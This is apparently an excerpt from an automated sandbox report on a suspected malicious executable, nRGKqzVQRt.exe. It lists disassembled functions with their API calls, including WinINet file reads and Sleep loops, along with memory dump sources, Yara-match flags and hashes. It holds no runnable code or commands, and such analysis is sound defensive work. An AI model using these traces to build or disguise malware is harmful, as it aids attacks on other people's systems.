                                                  Download Yara Rule
                                                  APIs
                                                  • __CreateFrameInfo.LIBCMT ref: 0044570F
                                                    • Part of subcall function 004412AF: __getptd.LIBCMT ref: 004412BD
                                                    • Part of subcall function 004412AF: __getptd.LIBCMT ref: 004412CB
                                                  • __getptd.LIBCMT ref: 00445719
                                                    • Part of subcall function 00444E8A: __getptd_noexit.LIBCMT ref: 00444E8D
                                                    • Part of subcall function 00444E8A: __amsg_exit.LIBCMT ref: 00444E9A
                                                  • __getptd.LIBCMT ref: 00445727
                                                  • __getptd.LIBCMT ref: 00445735
                                                  • __getptd.LIBCMT ref: 00445740
                                                    • Part of subcall function 00441354: __CallSettingFrame@12.LIBCMT ref: 004413A0
                                                    • Part of subcall function 0044580D: __getptd.LIBCMT ref: 0044581C
                                                    • Part of subcall function 0044580D: __getptd.LIBCMT ref: 0044582A
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603505125.000000000043E000.00000020.00000001.01000000.00000003.sdmp, Offset: 0043E000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_43e000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID: __getptd$CallCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
                                                  • String ID:
                                                  • API String ID: 3282538202-0
                                                  • Opcode ID: b6760be45b9f225ffa09967988b535121e0307cdc767a6bd6a579ea3f436cff5
                                                  • Instruction ID: 100f70731243ec5b3d05a4c225f3cf9df2c243dd7601ccd32b0289c9ab617f5e
                                                  • Opcode Fuzzy Hash: b6760be45b9f225ffa09967988b535121e0307cdc767a6bd6a579ea3f436cff5
                                                  • Instruction Fuzzy Hash: 1511B371C00609DBEF00EFA5C446BADBBB4FF44315F10806AE814A7252DB789A559F58
                                                  Function 0041FBDA Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • _free.LIBCMT ref: 0041FBF2
                                                    • Part of subcall function 004196E8: RtlFreeHeap.NTDLL(00000000,00000000,?,0041FE7B,?,00000000,?,?,?,0042011E,?,00000007,?,?,00420611,?), ref: 004196FE
                                                    • Part of subcall function 004196E8: GetLastError.KERNEL32(?,?,0041FE7B,?,00000000,?,?,?,0042011E,?,00000007,?,?,00420611,?,?), ref: 00419710
                                                  • _free.LIBCMT ref: 0041FC04
                                                  • _free.LIBCMT ref: 0041FC16
                                                  • _free.LIBCMT ref: 0041FC28
                                                  • _free.LIBCMT ref: 0041FC3A
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603446200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2603446200.000000000043A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID: _free$ErrorFreeHeapLast
                                                  • String ID:
                                                  • API String ID: 776569668-0
                                                  • Opcode ID: f71149921f413fa43df794f6df76e54a2fab879d3f4956e12af54e0adfca1412
                                                  • Instruction ID: 1c7e9378ca95dd73cb2f75351d3b74d040f08b2e1626f4982a7efc7f0f8a2d9c
                                                  • Opcode Fuzzy Hash: f71149921f413fa43df794f6df76e54a2fab879d3f4956e12af54e0adfca1412
                                                  • Instruction Fuzzy Hash: 30F06873649108A78624DB55E585CCB73DDBB04310354081BF488D7701C738FCC19AAC
                                                  Function 1000C51E Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • _free.LIBCMT ref: 1000C536
                                                    • Part of subcall function 10007A3C: RtlFreeHeap.NTDLL(00000000,00000000,?,100066F0), ref: 10007A52
                                                    • Part of subcall function 10007A3C: GetLastError.KERNEL32(?,?,100066F0), ref: 10007A64
                                                  • _free.LIBCMT ref: 1000C548
                                                  • _free.LIBCMT ref: 1000C55A
                                                  • _free.LIBCMT ref: 1000C56C
                                                  • _free.LIBCMT ref: 1000C57E
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2604696371.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.2604682634.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000000.00000002.2604717524.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000000.00000002.2604732003.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID: _free$ErrorFreeHeapLast
                                                  • String ID:
                                                  • API String ID: 776569668-0
                                                  • Opcode ID: 5af9cd1d934eff50961f68469d6981d65bd4349cdb7ac1437da5aad4e87a5e75
                                                  • Instruction ID: 9141c028a1f6e8267eca5b553c4c44ea57822cd8596d4ab818939ac7a44c1903
                                                  • Opcode Fuzzy Hash: 5af9cd1d934eff50961f68469d6981d65bd4349cdb7ac1437da5aad4e87a5e75
                                                  • Instruction Fuzzy Hash: BEF0E739A046289BE650DB68ECC2C1A73D9FB456E17608805F448E7699CB34FFC08AA4
                                                  Function 0067FE41 Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • _free.LIBCMT ref: 0067FE59
                                                    • Part of subcall function 0067994F: HeapFree.KERNEL32(00000000,00000000,?,006800E2,?,00000000,?,?,?,00680385,?,00000007,?,?,00680878,?), ref: 00679965
                                                    • Part of subcall function 0067994F: GetLastError.KERNEL32(?,?,006800E2,?,00000000,?,?,?,00680385,?,00000007,?,?,00680878,?,?), ref: 00679977
                                                  • _free.LIBCMT ref: 0067FE6B
                                                  • _free.LIBCMT ref: 0067FE7D
                                                  • _free.LIBCMT ref: 0067FE8F
                                                  • _free.LIBCMT ref: 0067FEA1
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603827557.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_660000_nRGKqzVQRt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _free$ErrorFreeHeapLast
                                                  • String ID:
                                                  • API String ID: 776569668-0
                                                  • Opcode ID: 833792b777c6c03e8cf0aa346d63d203dbff7c932eedd85bdc8b2f7842ed42dd
                                                  • Instruction ID: 777af9280cde547368bf69dd8d96074427d84b83165e311a2399c0cdb098b71b
                                                  • Opcode Fuzzy Hash: 833792b777c6c03e8cf0aa346d63d203dbff7c932eedd85bdc8b2f7842ed42dd
                                                  • Instruction Fuzzy Hash: B0F0F4735042017BDA65DB54E486C5B73DBAA04720758982DF59CD7722D734FC808A68
                                                  Function 004478A0 Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • __getptd.LIBCMT ref: 004478AC
                                                    • Part of subcall function 00444E8A: __getptd_noexit.LIBCMT ref: 00444E8D
                                                    • Part of subcall function 00444E8A: __amsg_exit.LIBCMT ref: 00444E9A
                                                  • __getptd.LIBCMT ref: 004478C3
                                                  • __amsg_exit.LIBCMT ref: 004478D1
                                                  • __lock.LIBCMT ref: 004478E1
                                                  • __updatetlocinfoEx_nolock.LIBCMT ref: 004478F5
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603505125.000000000043E000.00000020.00000001.01000000.00000003.sdmp, Offset: 0043E000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_43e000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                  • String ID:
                                                  • API String ID: 938513278-0
                                                  • Opcode ID: 923d6c630d4c297d87a02d45e19dfa0e084befcd42006bedb7e5a93df283f21b
                                                  • Instruction ID: cbe63d035281a46d543817e7181c3727ccf0586aed82f3b742ed6fc3b219eb25
                                                  • Opcode Fuzzy Hash: 923d6c630d4c297d87a02d45e19dfa0e084befcd42006bedb7e5a93df283f21b
                                                  • Instruction Fuzzy Hash: 3FF062329087109AF621BFA5540775E7790AF40729F21811FF424666D3CB2C4A42DB5D
                                                  Function 00665F7B Relevance: 7.4, APIs: 3, Strings: 1, Instructions: 378sleepCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 0066D373: RtlEnterCriticalSection.NTDLL(004383D4), ref: 0066D37E
                                                    • Part of subcall function 0066D373: RtlLeaveCriticalSection.NTDLL(004383D4), ref: 0066D3BB
                                                  • __Init_thread_footer.LIBCMT ref: 00665FC2
                                                    • Part of subcall function 0066D329: RtlEnterCriticalSection.NTDLL(004383D4), ref: 0066D333
                                                    • Part of subcall function 0066D329: RtlLeaveCriticalSection.NTDLL(004383D4), ref: 0066D366
                                                  • Sleep.KERNEL32(000007D0), ref: 00666340
                                                  • Sleep.KERNEL32(000007D0), ref: 0066635A
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603827557.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_660000_nRGKqzVQRt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CriticalSection$EnterLeaveSleep$Init_thread_footer
                                                  • String ID: updateSW
                                                  • API String ID: 500923978-2484434887
                                                  • Opcode ID: bd253d3c5d198e889332913f0522b8ddf46f9631c779f21dd1867174954e9587
                                                  • Instruction ID: 9bd4c751cbba43aa16e1ae4c3855ac90825e7069326dc5daac849d2bf2340a63
                                                  • Opcode Fuzzy Hash: bd253d3c5d198e889332913f0522b8ddf46f9631c779f21dd1867174954e9587
                                                  • Instruction Fuzzy Hash: 5BD12571A001548BDF289B28DC997ADBB77AF41304F1481EDF809AB392DB359EC4CB95
                                                  Function 0066A227 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 230COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 006643B7: ___std_exception_copy.LIBVCRUNTIME ref: 00664446
                                                  • std::locale::_Init.LIBCPMT ref: 0066A335
                                                    • Part of subcall function 0066C77D: std::_Lockit::_Lockit.LIBCPMT ref: 0066C78F
                                                    • Part of subcall function 0066C77D: std::locale::_Setgloballocale.LIBCPMT ref: 0066C7AA
                                                    • Part of subcall function 0066C77D: _Yarn.LIBCPMT ref: 0066C7C0
                                                    • Part of subcall function 0066C77D: std::_Lockit::~_Lockit.LIBCPMT ref: 0066C800
                                                    • Part of subcall function 0066AE47: std::_Lockit::_Lockit.LIBCPMT ref: 0066AE7D
                                                    • Part of subcall function 0066AE47: std::_Lockit::_Lockit.LIBCPMT ref: 0066AEA0
                                                    • Part of subcall function 0066AE47: std::_Lockit::~_Lockit.LIBCPMT ref: 0066AEC0
                                                    • Part of subcall function 0066AE47: std::_Lockit::~_Lockit.LIBCPMT ref: 0066AF3A
                                                  • std::locale::_Init.LIBCPMT ref: 0066A3F8
                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 0066A50F
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603827557.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_660000_nRGKqzVQRt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Lockitstd::_$Lockit::_Lockit::~_std::locale::_$Init$Concurrency::cancel_current_taskSetgloballocaleYarn___std_exception_copy
                                                  • String ID: X:C
                                                  • API String ID: 569503877-1469212745
                                                  • Opcode ID: 217f668ab1de721d73fda48ba94b0dbc39f4964a2ce04ccc1313e00a63b23f01
                                                  • Instruction ID: 07ac97c45bd07ab417ffb4bc3442168fc8174899fff6a08425f727cf7006c0bb
                                                  • Opcode Fuzzy Hash: 217f668ab1de721d73fda48ba94b0dbc39f4964a2ce04ccc1313e00a63b23f01
                                                  • Instruction Fuzzy Hash: 46A136B4A00205DFDB00CF54C494B9ABBF5FF49314F1582A9E809AF792D7BAA944CF91
                                                  Function 10007CBA Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 206COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2604696371.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.2604682634.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000000.00000002.2604717524.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000000.00000002.2604732003.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID: _free
                                                  • String ID: *?
                                                  • API String ID: 269201875-2564092906
                                                  • Opcode ID: 5cf7f851aaec087829ec43eeaab6f60b67ed4c75ee81a41c35adb74eb9a8a420
                                                  • Instruction ID: 7b94f7270babd41a129a228fbe6cecbdc5f775369f8c1ab1d48f9322781d5c4e
                                                  • Opcode Fuzzy Hash: 5cf7f851aaec087829ec43eeaab6f60b67ed4c75ee81a41c35adb74eb9a8a420
                                                  • Instruction Fuzzy Hash: 0C614175D0021A9FEB14CFA9C8815EDFBF5FF48390B2581AAE809F7344D675AE418B90
                                                  Function 10006038 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 123COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2604696371.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.2604682634.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000000.00000002.2604717524.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000000.00000002.2604732003.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: C:\Users\user\Desktop\nRGKqzVQRt.exe$h'u
                                                  • API String ID: 0-1145913199
                                                  • Opcode ID: 4a8ba0bb3459913fcd586df3a76a6e4d0e3c9f4097a590b62cd75fbc9ff119e1
                                                  • Instruction ID: cc2ecb4b5d0b55cd4a25e2381517e3645a439caaa5f14caae8cc7f97f4731dcb
                                                  • Opcode Fuzzy Hash: 4a8ba0bb3459913fcd586df3a76a6e4d0e3c9f4097a590b62cd75fbc9ff119e1
                                                  • Instruction Fuzzy Hash: 9241AD75E00215BBEB11CB99CC8199FBBF9EF89390B244066F901A7216D6719B80CB90
                                                  Function 006769C4 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 123COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603827557.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_660000_nRGKqzVQRt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: C:\Users\user\Desktop\nRGKqzVQRt.exe$h'u
                                                  • API String ID: 0-1145913199
                                                  • Opcode ID: bb4cfbba668be04de8d9afecadb41173a1c3b024eb1c9cedbc90692787106584
                                                  • Instruction ID: fced65c5c8163eaa3016068cbabcf3d1c3aec45149e47900976993d52b562c95
                                                  • Opcode Fuzzy Hash: bb4cfbba668be04de8d9afecadb41173a1c3b024eb1c9cedbc90692787106584
                                                  • Instruction Fuzzy Hash: E641A2B1A00615AFDB21DB99CC81DEFBBBAEF84710F14C06AF509A7311EA719E41CB54
                                                  Function 0041BE0C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 99COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • __alloca_probe_16.LIBCMT ref: 0041BE7F
                                                  • GetStringTypeW.KERNEL32(?,00000000,00000000,00000001,?,?,?,?,?,?,?,?,?,?,?,0000FDE9), ref: 0041BEDC
                                                  • __freea.LIBCMT ref: 0041BEE5
                                                    • Part of subcall function 0041A395: RtlAllocateHeap.NTDLL(00000000,?,?,?,0040E15B,?,?,?,004010DD,?,00403497,?,?,?), ref: 0041A3C7
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603446200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2603446200.000000000043A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID: AllocateHeapStringType__alloca_probe_16__freea
                                                  • String ID: uA
                                                  • API String ID: 2035984020-3888042258
                                                  • Opcode ID: 7155a43ec1d6933e7fe47e47275e285a3df6f51680ee3be0c486694057325eca
                                                  • Instruction ID: 8ad0d2bb7cf9ccb20e4a1086eca39ddb9b037eee8af06865313e927ef5ed8ba2
                                                  • Opcode Fuzzy Hash: 7155a43ec1d6933e7fe47e47275e285a3df6f51680ee3be0c486694057325eca
                                                  • Instruction Fuzzy Hash: E631AF7290021AABDB219F65CC41EEF7BB9EF84714F05412AFD14A7291D7388D91CBE8
                                                  Function 00404150 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 64COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • ___std_exception_copy.LIBVCRUNTIME ref: 004041DF
                                                    • Part of subcall function 0040E393: RaiseException.KERNEL32(E06D7363,00000001,00000003,?,004010DD,?,0040C2C5,?,00435218,?,?,?,?,004010DD,00438E00,00438E01), ref: 0040E3F3
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603446200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2603446200.000000000043A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID: ExceptionRaise___std_exception_copy
                                                  • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                  • API String ID: 3109751735-1866435925
                                                  • Opcode ID: 9681fa31f44d55695c752986d1b18a626e2cd7d4e58cff6f511573f18fceb534
                                                  • Instruction ID: 13cacc8724f6aa836e6ba3b181d95373929fba2349835315f28fc814294e7515
                                                  • Opcode Fuzzy Hash: 9681fa31f44d55695c752986d1b18a626e2cd7d4e58cff6f511573f18fceb534
                                                  • Instruction Fuzzy Hash: 6911D2F1600704ABC310DE69C802B96B7E8AF94311F14C63FFA54AB681E778E954CB99
                                                  Function 006643B7 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 64COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • ___std_exception_copy.LIBVCRUNTIME ref: 00664446
                                                    • Part of subcall function 0066E5FA: RaiseException.KERNEL32(E06D7363,00000001,00000003,?,00661344,?,0066C52C,?,00435218,?,?,?,?,00661344,00438E00,00438E01), ref: 0066E65A
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603827557.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_660000_nRGKqzVQRt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ExceptionRaise___std_exception_copy
                                                  • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                  • API String ID: 3109751735-1866435925
                                                  • Opcode ID: 620105460546bc7a548feef953e988388133d47a47cf20a4bd6377840e9f9762
                                                  • Instruction ID: 0ec194b0a5ed4b10cf81698b120daaf9fa55974c80cdb50a0af8c9bb599de0e7
                                                  • Opcode Fuzzy Hash: 620105460546bc7a548feef953e988388133d47a47cf20a4bd6377840e9f9762
                                                  • Instruction Fuzzy Hash: A61121B1600704ABC300DF18C802B9AB3E9EF94311F14C62BF95597741EB75EA10CB95
                                                  Function 00440D2C Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 41COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • _malloc.LIBCMT ref: 00440D46
                                                    • Part of subcall function 00442116: __FF_MSGBANNER.LIBCMT ref: 0044212F
                                                    • Part of subcall function 00442116: __NMSG_WRITE.LIBCMT ref: 00442136
                                                  • std::exception::exception.LIBCMT ref: 00440D7B
                                                  • std::exception::exception.LIBCMT ref: 00440D95
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603505125.000000000043E000.00000020.00000001.01000000.00000003.sdmp, Offset: 0043E000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_43e000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID: std::exception::exception$_malloc
                                                  • String ID: C
                                                  • API String ID: 993072523-1915930400
                                                  • Opcode ID: 8b603603fc2e72764e8159916ceab556aeede2d005fbef45fca51803ed383819
                                                  • Instruction ID: 309dc15a062e557a29022923b085cfe56a5b7c6be6ef7efd11823a81c16b354e
                                                  • Opcode Fuzzy Hash: 8b603603fc2e72764e8159916ceab556aeede2d005fbef45fca51803ed383819
                                                  • Instruction Fuzzy Hash: 9AF0F9709002095AEB10ABD5EC0679E3BA96B41718F10403FFB00A61E3CBFC9A69835E
                                                  Function 00444D5D Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 40COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • __lock.LIBCMT ref: 00444DA2
                                                    • Part of subcall function 00447A93: __mtinitlocknum.LIBCMT ref: 00447AA9
                                                    • Part of subcall function 00447A93: __amsg_exit.LIBCMT ref: 00447AB5
                                                    • Part of subcall function 00447A93: RtlFreeHeap.NTDLL(00000000,00000000,?,00444DA7,0000000D), ref: 00447ABD
                                                  • __lock.LIBCMT ref: 00444DC3
                                                  • ___addlocaleref.LIBCMT ref: 00444DE1
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603505125.000000000043E000.00000020.00000001.01000000.00000003.sdmp, Offset: 0043E000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_43e000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID: __lock$FreeHeap___addlocaleref__amsg_exit__mtinitlocknum
                                                  • String ID: 8(@
                                                  • API String ID: 4016207243-4273504768
                                                  • Opcode ID: 94cd8b7a7404d5e253c1fc2766e583b4f892fa046bf5be8a5fe60ef0ec7bd25c
                                                  • Instruction ID: 4db1ba5b61d5021f4c39dccde2a34a0d81d02722981cb316bdf5bd15526fb5f9
                                                  • Opcode Fuzzy Hash: 94cd8b7a7404d5e253c1fc2766e583b4f892fa046bf5be8a5fe60ef0ec7bd25c
                                                  • Instruction Fuzzy Hash: 6C0165B1444B019BE720EF66C506749FBE0AF40319F20891FE495666E1CBB89A45CB58
                                                  Function 10004F12 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,10004EC3,00000000,?,00000001,?,?,?,10004FB2,00000001,FlsFree,10011CC0,FlsFree), ref: 10004F1F
                                                  • GetLastError.KERNEL32(?,10004EC3,00000000,?,00000001,?,?,?,10004FB2,00000001,FlsFree,10011CC0,FlsFree,00000000,?,10003ECF), ref: 10004F29
                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 10004F51
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2604696371.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.2604682634.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000000.00000002.2604717524.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000000.00000002.2604732003.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID: LibraryLoad$ErrorLast
                                                  • String ID: api-ms-
                                                  • API String ID: 3177248105-2084034818
                                                  • Opcode ID: 194d23d78a7530926df8253abc19602fce8fc6649c780d967afcd7dccf04e9f6
                                                  • Instruction ID: 9caaa85424732638a533447db036373c94518d46a1d9f65793ecca3e1a8de25d
                                                  • Opcode Fuzzy Hash: 194d23d78a7530926df8253abc19602fce8fc6649c780d967afcd7dccf04e9f6
                                                  • Instruction Fuzzy Hash: 19E01274644245B6FB155B60DC45F993B95DB047D0F118030FA0CA80E5DBB1E99599C9
                                                  Function 0041A79F Relevance: 6.3, APIs: 4, Instructions: 320COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603446200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2603446200.000000000043A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID: _strrchr
                                                  • String ID:
                                                  • API String ID: 3213747228-0
                                                  • Opcode ID: 4ae5112772388eae5d59444569f6d0a61886308d2200cae73a5f5cb9bdd6ce13
                                                  • Instruction ID: 8ec614d2e68f5847cdab36d5c1b166ed75c8c05dfdab0d31a35a8bf3d15cb102
                                                  • Opcode Fuzzy Hash: 4ae5112772388eae5d59444569f6d0a61886308d2200cae73a5f5cb9bdd6ce13
                                                  • Instruction Fuzzy Hash: DCB14471A122859FDB11CF28C8417FFBBA5EF45340F15856BE844AB342D2388D92CB6A
                                                  Function 0067AA06 Relevance: 6.3, APIs: 4, Instructions: 320COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603827557.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_660000_nRGKqzVQRt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _strrchr
                                                  • String ID:
                                                  • API String ID: 3213747228-0
                                                  • Opcode ID: 4ae5112772388eae5d59444569f6d0a61886308d2200cae73a5f5cb9bdd6ce13
                                                  • Instruction ID: 5ca8a2c9336db485a1c3fdd503357e74669f01e8cf1af51e2f1252c2e13aedda
                                                  • Opcode Fuzzy Hash: 4ae5112772388eae5d59444569f6d0a61886308d2200cae73a5f5cb9bdd6ce13
                                                  • Instruction Fuzzy Hash: 36B11872901245AFDB16CFA8C8817FEBBE7EF95340F25C1A9E8499B341D6348D41CB62
                                                  Function 00661AA7 Relevance: 6.3, APIs: 4, Instructions: 298networkfileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • InternetSetFilePointer.WININET(?,00000000,00000000,00000000,00000000), ref: 00661B2C
                                                  • InternetReadFile.WININET(?,00000000,000003E8,00000000), ref: 00661B4B
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603827557.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_660000_nRGKqzVQRt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: FileInternet$PointerRead
                                                  • String ID:
                                                  • API String ID: 3197321146-0
                                                  • Opcode ID: c085227df8a80421ec7313379bf4d4e615632bf12d4a1848d02713aae509a95a
                                                  • Instruction ID: 239d476c893748aff447d016131d578de025fe5a40e3f281d303f7724ffe9700
                                                  • Opcode Fuzzy Hash: c085227df8a80421ec7313379bf4d4e615632bf12d4a1848d02713aae509a95a
                                                  • Instruction Fuzzy Hash: BEC16770A002189FEB64CF24CD85BEAB7BAFF49304F5441D8E409AB691DB71AE85CF54
                                                  Function 00409FC0 Relevance: 6.2, APIs: 4, Instructions: 230COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00404150: ___std_exception_copy.LIBVCRUNTIME ref: 004041DF
                                                  • std::locale::_Init.LIBCPMT ref: 0040A0CE
                                                    • Part of subcall function 0040C516: std::_Lockit::_Lockit.LIBCPMT ref: 0040C528
                                                    • Part of subcall function 0040C516: std::locale::_Setgloballocale.LIBCPMT ref: 0040C543
                                                    • Part of subcall function 0040C516: _Yarn.LIBCPMT ref: 0040C559
                                                    • Part of subcall function 0040C516: std::_Lockit::~_Lockit.LIBCPMT ref: 0040C599
                                                    • Part of subcall function 0040ABE0: std::_Lockit::_Lockit.LIBCPMT ref: 0040AC16
                                                    • Part of subcall function 0040ABE0: std::_Lockit::_Lockit.LIBCPMT ref: 0040AC39
                                                    • Part of subcall function 0040ABE0: std::_Lockit::~_Lockit.LIBCPMT ref: 0040AC59
